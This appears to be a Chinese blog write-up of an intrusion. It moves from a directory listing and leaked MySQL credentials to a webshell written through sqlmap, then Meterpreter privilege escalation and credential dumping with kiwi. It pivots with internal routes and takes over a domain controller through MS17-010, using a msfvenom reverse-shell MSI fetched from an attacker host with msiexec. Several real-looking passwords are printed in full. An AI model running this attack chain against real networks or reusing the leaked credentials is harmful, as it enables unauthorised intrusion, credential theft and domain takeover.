目录浏览致域沦陷
目录浏览引发的血案
漏洞
- 目录浏览
- phpinfo.php
- mysql密码泄漏
- phpmyadmin
目录泄漏,到处查看文件,其中一个配置文件里面找到了一个mysql用户及密码
http://xxxx:8880/inc/func/mysql.inc |
$conn_local=db_connect('localhost','nik','niknik','cugaet'); |
phpmyadmin 能登录,
http://xxxx:8880/phpmyadmin |
登录以后发现为dba,i结合phpinfo泄漏的路径可以直接写shell,顺便查看root密码02061978
sqlmap -d mysql://nik:niknik@xxxx:3306/mysql --file-write=/root/webshell/shell.php --file-dest=C:/xampp/htdocs/shell.php |
菜刀链接以后开始信息收集
找到了mssql sa密码
C:/wamp/www/automatic_oop/gubo/load.php
xxxxx:1433 - Login Successful: WORKSTATION\sa:57835783
权限也比较高,
上传msf监听,getsystem,load-kiwi
导出密码
Username Domain Password
|
tspkg credentials
Username Domain Password |
arp -a获取一部分内网ip,提取ip,
route add 192.168.2.1/24 1 |
添加路由
据上面判断有域

ms17-010扫描一波
域控制器DC,datacenter 存在17-010
dc目标为x86不能直接用msf的17-010,所以通过 admin/smb/ms17_010_command 来执行命令
生成一个msi,然后下载执行,
msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=xxxx lport=port rc4password=xxx -f msi > xxx.msi |
msf 设置好监听 Exploit: multi/handler windows/meterpreter/reverse_tcp_rc4
设置需要执行的命令
set command msiexec /qn /i http://xxx/xxx.msi |
至此拿下域Dc,导出域内用户hash
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Hao DevSecOps!
评论



